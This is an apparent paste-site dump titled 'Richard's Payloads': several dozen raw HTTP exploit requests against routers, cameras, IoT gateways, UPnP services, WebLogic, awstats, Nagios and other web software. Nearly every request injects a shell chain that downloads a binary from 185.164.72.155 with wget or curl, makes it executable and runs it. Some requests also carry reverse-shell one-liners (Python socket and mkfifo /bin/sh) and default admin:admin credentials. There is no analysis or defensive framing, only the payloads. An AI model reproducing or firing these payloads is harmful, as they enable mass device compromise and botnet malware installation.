
Richard's Payloads

a guest
Aug 6th, 2019
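  1. Different payloads (each request targets a different web endpoint; nearly all inject the same shell command chain, which downloads a file named "richard" from 185.164.72.155 via wget/curl, marks it executable and runs it):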
  2.  
  3. POST /portal/apis/aggrecate_js.cgi?script=launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22 HTTP/1.1
  4. Content-Length: 630
  5. Accept-Encoding: gzip, deflate
  6. Accept: /
  7. User-Agent: Hello-World
  8. Connection: keep-alive
  9.  
  10.  
  11. POST /stainfo.cgi?ifname=eth0;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  12.  
  13.  
  14. GET /cgi-bin/masterCGI?ping=nomip&user=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  15.  
  16.  
  17. GET /cgi-bin/script?cd /tmp;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  18.  
  19.  
  20. GET /Main_Analysis_Content.asp?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.target.com&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=%60uwget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60&pingCNT=5 HTTP/1.1
  21. Host: 192.168.0.1:80
  22. Connection: keep-alive
  23. Pragma: no-cache
  24. Cache-Control: no-cache
  25. Upgrade-Insecure-Requests: 1
  26. Connection: keep-alive
  27. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
  28. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  29. Referer: http://www.target.com/Main_Analysis_Content.asp
  30. Accept-Encoding: gzip, deflate
  31. Accept-Language: en-US,en;q=0.9
  32.  
  33.  
  34. GET /apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=192.168.1.1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&pingCNT=5 HTTP/1.1
  35. Host: 192.168.1.1:80
  36. Proxy-Connection: keep-alive
  37. Authorization: Basic ZGVmYXVsdA==
  38. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  39. User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36
  40. Referer: http://192.168.1.1/Main_Analysis_Content.asp
  41. Accept-Encoding: gzip,deflate,sdch
  42. Accept-Language: en-US,en;q=0.8
  43.  
  44.  
  45. GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;echo%20YYY;').exit().%24a[ HTTP/1.1
  46. sort=].phpinfo().exit().$a[
  47. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  48. Connection: Close
  49.  
  50.  
  51. GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;echo%20YYY;echo| HTTP/1.1
  52. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  53. Connection: Close
  54.  
  55.  
  56. GET /cgi-bin/awstats.pl?migrate=|echo;echo%20YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;echo%20YYY;echo|awstats HTTP/1.1
  57. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  58. Connection: Close
  59.  
  60.  
  61. GET /cgi-bin/img.pl HTTP/1.1
  62. f=etc/hosts
  63. f=%Q!bin/sh -c echo 'YYY';wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; echo 'YYY'|!
  64.  
  65.  
  66. POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.1
  67. User-Agent: Hello-World
  68. Host: 192.168.0.1:5120
  69. Content-type: text/xml; charset=utf-8
  70. SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write
  71. M-SEARCH * HTTP/1.1
  72. HOST: 239.255.255.250:1900
  73. MAN: ssdp:discover
  74. MX: 3
  75. ST: upnp:rootdevice
  76. <?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup><IndexOffset>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</IndexOffset><pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>
  77.  
  78.  
  79. POST /upnp/control/basicevent1 HTTP/1.1
  80. Host: %s:49152
  81. Connection: keep-alive
  82. Accept-Encoding: gzip, deflate Accept: */*
  83. User-Agent: python-requests/2.18.4
  84. SOAPAction: urn:Belkin:service:basicevent:1#SetSmartDevInfo
  85. Content-Length: 393
  86. <?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body><u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1"> <SmartDevURL>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/ECHOBOT; chmod +x /tmp/ECHOBOT; /tmp/ECHOBOT</SmartDevURL> </u:SetSmartDevInfo> </s:Body> </s:Envelope>
  87.  
  88.  
  89. GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  90. Authorization: Basic YWRtaW46YWRtaW4=
  91. Server: Boa/0.94.14rc21
  92. Accept-Ranges: bytes
  93. Connection: close
  94. Content-type: text/plain
  95.  
  96.  
  97. POST /cgi-bin/file_transfer.cgi HTTP/1.1
  98. Content-Type: application/x-www-form-urlencoded
  99. file_transfer=new&dir='Pa_Notewget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richardPa_Note
  100.  
  101.  
  102. POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % 99999 cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  103. 'SSL_CLIENT_VERIFY' : 'SUCCESS'
  104. get_package_fil:
  105. site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: active
  106. User-Agent: Hello-World
  107. Connection: keep-alive
  108. <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
  109.  
  110.  
  111. POST /web/cgi-bin/usbinteract.cgi HTTP/1.1
  112. Host: 192.168.0.1:9000
  113. Content-Length: 155
  114. Content-Type: application/x-www-form-urlencoded
  115. action=7&path="|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard||
  116.  
  117.  
  118. POST /dogfood/mail/spell.php HTTP/1.1
  119. data=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  120.  
  121.  
  122. POST /apps/a3/cfg_ethping.cgi HTTP/1.1
  123. MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%26
  124.  
  125.  
  126. POST /cgi-bin/;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/ECHOBOT; chmod +x /tmp/ECHOBOT; /tmp/ECHOBOT HTTP/1.1
  127.  
  128.  
  129. POST /service/krashrpt.php HTTP/1.1
  130. Host: 192.168.0.1:80
  131. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
  132. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  133. Accept: /
  134. User-Agent: Hello-World
  135. Accept-Language: en-US,en;q=0.5
  136. Accept-Encoding: gzip, deflate
  137. Cookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24
  138. Connection: close
  139. Upgrade-Insecure-Requests: 1
  140. Content-Type: application/x-www-form-urlencoded
  141. Content-Length: 37
  142. kuid=id | wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  143.  
  144.  
  145. POST /soap.cgi?service=WANIPConn1 HTTP/1.1
  146. Content-Length: 649
  147. Host: 10.8.28.133:49152
  148. Content-Type: text/xml
  149. SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
  150. <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription></NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>
  151.  
  152.  
  153. POST /webadmin/script?command=|wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  154. Content-Length: 630
  155. Accept-Encoding: gzip, deflate
  156. Accept: /
  157. User-Agent: Hello-World
  158. Connection: keep-alive
  159.  
  160.  
  161. GET /recordings/misc/callme_page.php?action=c&callmenum=@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%0D%0A%0D%0A HTTP/1.1
  162.  
  163.  
  164. GET /cgi-bin/webcm HTTP/1.1
  165. var:lang&cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  166.  
  167.  
  168. POST /uapi-cgi/viewer/admin/testaction.cgi?&type=ip&ip=eth0%20wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard|ping%20-c%203%201.1.1.1|x HTTP/1.1
  169. Content-Length: 630
  170. Accept-Encoding: gzip, deflate
  171. Accept: /
  172. User-Agent: Hello-World
  173. Connection: keep-alive
  174.  
  175.  
  176. GET /api/project/repo/log/graph/%60wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60 HTTP/1.1
  177.  
  178.  
  179. POST /api/backup/logout.cgi?sid=aa HTTP/1.1
  180. Content-type: text/html
  181. wget+http://185.164.72.155/richard+-O+/tmp/ECHOBOT; chmod +x /tmp/ECHOBOT; /bin/tclsh+/tmp/ECHOBOT
  182.  
  183.  
  184. POST /protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  185. Content-Length: 630
  186. Accept-Encoding: gzip, deflate
  187. Accept: /
  188. User-Agent: Hello-World
  189. Connection: keep-alive
  190.  
  191.  
  192. POST /html/SetSmarcardSettings.php HTTP/1.1
  193. Content-Length: 11660
  194. Content-Type: application/x-www-form-urlencoded
  195. Connection: close
  196. X-Powered-By: PHP/5.5.13
  197. User-Agent: joxypoxy/7.2.6
  198. HidChannelID=2&HidcmbBook=0&cmbBook=0|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08
  199.  
  200.  
  201. GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard aux&message= HTTP/1.1
  202. Host: 192.168.1.1:80
  203. Authorization: Basic YWRtaW46YWRtaW4=
  204.  
  205.  
  206. GET /awcuser/cgi-bin/vcs HTTP/1.1
  207. xml=withXsl
  208. xsl=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  209.  
  210.  
  211. GET /nagios/cgi-bin/statuswml.cgi?ping=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%3Becho+%24PATH HTTP/1.1
  212.  
  213.  
  214. GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%205;%27 HTTP/1.1
  215.  
  216.  
  217. GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;%27 HTTP/1.1
  218. Host: 192.168.0.1:50000
  219. Connection: keep-alive
  220. Cache-Control: max-age=0
  221. Upgrade-Insecure-Requests: 1
  222. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
  223. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  224. Accept-Encoding: gzip, deflate
  225. Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
  226. Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en
  227.  
  228.  
  229. GET /scripts/rpc.php?action=updatetime&timeserver=||cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  230.  
  231.  
  232. POST /op5config/welcome HTTP/1.1
  233. Connection: Close
  234. do=do=Login&password=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  235.  
  236.  
  237. GET /monitor/op5/nacoma/command_test.php?cmd_str=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  238.  
  239.  
  240. GET /OvCgi/connectedNodes.ovpl HTTP/1.1
  241. %Q!; echo YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; echo YYY| tr
  242.  
  243.  
  244. POST /_async/AsyncResponseServiceHttps HTTP/1.1
  245. Accept-Encoding: gzip, deflate
  246. Accept: */*
  247. Accept-Language: en
  248. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  249. User-Agent: Hello-World
  250. Connection: close
  251. Content-Type: text/xml
  252. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService" <soapenv:Header>
  253. <wsa:Action>xx</wsa:Action>
  254. <wsa:RelatesTo>xx</wsa:RelatesTo>
  255. </work:WorkContext> xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
  256.  
  257.  
  258. POST /moadmin/moadmin.php HTTP/1.1
  259. Host: 192.168.0.1:80
  260. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0
  261. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  262. Accept-Language: en-US,en;q=0.5
  263. Accept-Encoding: gzip, deflate
  264. DNT: 1
  265. Connection: keep-alive
  266. Pragma: no-cache
  267. Cache-Control: no-cache
  268. Content-Type: application/x-www-form-urlencoded
  269. Content-Length: 34
  270. object=1;system(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard);exit
  271.  
  272.  
  273. GET /p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  274.  
  275.  
  276. POST /parse_xml.cgi HTTP/1.1
  277. Content-Length:
  278. Content-Type: application/x-www-form-urlencoded
  279. filename=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  280.  
  281.  
  282. POST /users/%2f/%2fproc%2fself%2fcomm HTTP/1.1
  283. Content-Type: multipart/form-data; boundary=
  284. <%=`wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/richard; chmod +x /tmp/richard; /tmp/richard`%>
  285.  
  286.  
  287. POST /wanipcn.xml HTTP/1.1
  288. Content-Length: 630
  289. Accept-Encoding: gzip, deflate
  290. SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
  291. Accept: /
  292. User-Agent: Hello-World
  293. Connection: keep-alive
  294. <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
  295.  
  296.  
  297. GET /repository/annotate?rev=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  298. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  299. Connection: Close
  300.  
  301.  
  302. POST /SGPAdmin/fileRequest HTTP/1.1
  303. &invoker=&title=&params=&id=&cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&source=&query=
  304.  
  305.  
  306. GET /goform/formSysCmd HTTP/1.1
  307. ('<textarea rows="15" name="msg" cols="80" wrap="virtual">')
  308. ('</textarea>')
  309. {'sysCmd': cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
  310.  
  311. POST cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;&ping_count=1&action=Apply&html_view=ping HTTP/1.1
  312.  
  313.  
  314. GET /?search[send][]=eval&search[send][]=Kernel.fork%20do%60wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60end HTTP/1.1
  315. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  316. Connection: Close
  317.  
  318.  
  319. GET /qsrserver/device/getThumbnail?sourceUri=
  320. +-;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f+|+/bin/sh+-i+2>&1+|+;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/f; chmod 777 /tmp/f; /tmp/f; >/tmp/f ;&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&=1537275717150 HTTP/1.1
  321. Content-Length: 630
  322. Accept-Encoding: gzip, deflate
  323. User-Agent: Hello-World
  324. Host: 192.168.0.1:9080
  325. Connection: keep-alive
  326.  
  327.  
  328. POST /page/maintenance/lanSettings/dns HTTP/1.1
  329. Host: 192.168.0.1:80
  330. Content-Length: 64
  331. Accept: */*
  332. Origin: http://192.168.0.1
  333. X-Requested-With: XMLHttpRequest
  334. User-Agent: Testingus/1.0
  335. Content-Type: application/x-www-form-urlencoded
  336. Referer: http://192.168.0.1/maintenance
  337. Accept-Language: en-US,en;q=0.8,mk;q=0.6
  338. Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
  339. Connection: close
  340. dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60
  341.  
  342.  
  343. POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1
  344. Host: 192.168.0.1
  345. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
  346. Accept: /
  347. Accept-Language: en-US,en;q=0.5
  348. Accept-Encoding: gzip, deflate
  349. Connection: close
  350. Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
  351. Content-Type: application/x-www-form-urlencoded
  352. Content-Length: 86
  353. op=export&language=english&interval=1&object_id=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  354.  
  355.  
  356. POST /upnp/control/hag HTTP/1.1
  357. Host: %s:49451
  358. Accept: text/javascript, text/html, application/xml, text/xml, */*
  359. Accept-Language: en-us,en;q=0.5
  360. Accept-Encoding: gzip, deflate
  361. X-Requested-With: XMLHttpRequest
  362. X-Prototype-Version: 1.7
  363. Content-Type: text/xml;charset=UTF-8
  364. MIME-Version: 1.0
  365. Content-Length: 311
  366. Connection: keep-alive
  367. Pragma: no-cache
  368. SOAPAction: urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua
  369. <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)</Code> </u:RunLua></s:Body></s:Envelope>
  370.  
  371.  
  372. POST /scripts/ajaxPortal.lua HTTP/1.1
  373. User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
  374. Accept: application/json, text/javascript, */*; q=0.01
  375. Accept-Language: en-US,en;q=0.5
  376. Accept-Encoding: gzip, deflate
  377. Referer: https://www.vmware.com
  378. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  379. X-Requested-With: XMLHttpRequest
  380. Cookie: culture=en-us
  381. Connection: close
  382. destination=8.8.8.8$(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic
  383. destination=8.8.8.8$(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)&source=192.168.0.1&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic
  384.  
  385.  
  386. POST /cgi-bin/rdfs.cgi HTTP/1.1
  387. Host: 192.168.0.1:80
  388. application/x-www-form-urlencoded
  389. Content-Length: 1024
  390. Client=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;&Download=submit
  391.  
  392.  
  393. GET /system.ini?loginuse&loginpas HTTP/1.1
  394.  
  395.  
  396. GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://185.164.72.155/richard; chmod+777+/tmp/richard; /tmp/richard+goahead)&dir=/&mode=PORT&upload_interval=0
  397.  
  398.  
  399. GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s
  400.  
  401.  
  402. GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0
  403.  
  404.  
  405. POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
  406. Host: 10.0.0.1:80
  407. User-Agent:
  408. Accept: application/json, text/javascript, */*; q=0.01
  409. Accept-Language: en-US,en;q=0.5
  410. Accept-Encoding: gzip, deflate
  411. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  412. X-Requested-With: XMLHttpRequest
  413. Referer: http://10.0.0.1/network_diagnostic_tools.php
  414. Content-Length: 91
  415. Cookie: PHPSESSID=; auth=
  416. DNT: 1
  417. X-Forwarded-For: 8.8.8.8
  418. Connection: keep-alive
  419. test_connectivity=true&destination_address=www.comcast.net || cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; &count1=4
  420.  
  421.  
  422. POST /cgi-bin/cgiServer.exx HTTP/1.1
  423. Host: 10.0.75.122:80
  424. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  425. Accept-Language: en-US,en;q=0.5
  426. Accept-Encoding: gzip, deflate
  427. Authorization: Basic YWRtaW46YWRtaW4=
  428. Connection: keep-alive
  429. Content-Type: application/x-www-form-urlencoded
  430. Content-Length: 0
  431. system(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)
  432.  
  433.  
  434. GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;%22 HTTP/1.1